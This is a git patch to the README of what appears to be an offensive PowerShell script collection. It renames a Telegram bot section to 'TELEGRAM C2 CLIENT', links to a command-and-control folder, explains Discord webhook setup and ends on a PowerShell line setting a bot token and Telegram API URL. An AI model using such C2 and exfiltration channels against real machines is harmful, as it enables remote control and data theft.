From f02da19da26ad31ab3b60e818bcfc6dfc08dab76 Mon Sep 17 00:00:00 2001 From: beigeworm <93350544+beigeworm@users.noreply.github.com> Date: Wed, 23 Aug 2023 16:57:08 +0100 Subject: [PATCH] Update README.md --- Fast-Execution-Scripts/README.md | 7 ++----- 1 file changed, 2 insertions(+), 5 deletions(-) diff --git a/Fast-Execution-Scripts/README.md b/Fast-Execution-Scripts/README.md index 42037e2..8fd3600 100644 --- a/Fast-Execution-Scripts/README.md +++ b/Fast-Execution-Scripts/README.md @@ -29,11 +29,8 @@ eg. `replace DISCORD_WEBHOOK to your webhook.` etc.. 1. (Server Admin Required) On a discord server chat goto > "edit channel" > "integrations" > "webhooks" 2. make a new webhook, name it and then click "copy webhook URL". -**TELEGRAM BOT SETUP** -1. visit https://t.me/botfather and make a bot. -2. add bot api to script. -3. search for bot in top left box in telegram and start a chat then type /start. -4. add chat ID for the chat bot (use this below to find the chat id) +**TELEGRAM C2 CLIENT** +1. visit https://github.com/beigeworm/Powershell-Tools-and-Toys/tree/main/Command-and-Control for more info `$token='YOUR_TOKEN' #Replace this with your bot Token $URL='https://api.telegram.org/bot{0}' -f $Token